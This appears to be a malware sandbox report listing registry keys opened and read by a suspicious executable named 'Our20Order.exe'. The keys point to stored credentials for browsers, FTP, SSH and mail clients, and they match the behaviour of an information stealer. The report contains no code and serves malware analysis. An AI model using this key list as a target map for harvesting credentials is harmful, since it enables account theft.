HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\Our20Order.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\2DC8850A
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Macromedia
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x9e\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd1\x88\xef\xbf\xbd\xef\xbf\xbd\xd1\x96\xef\xbf\xbd\xd0\x9e\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\xaf\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x99\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x99\xef\xbf\xbd\xef\xbf\xbd\xd1\x8f\xef\xbf\xbd\xef\xbf\xbd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\2DC8850A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
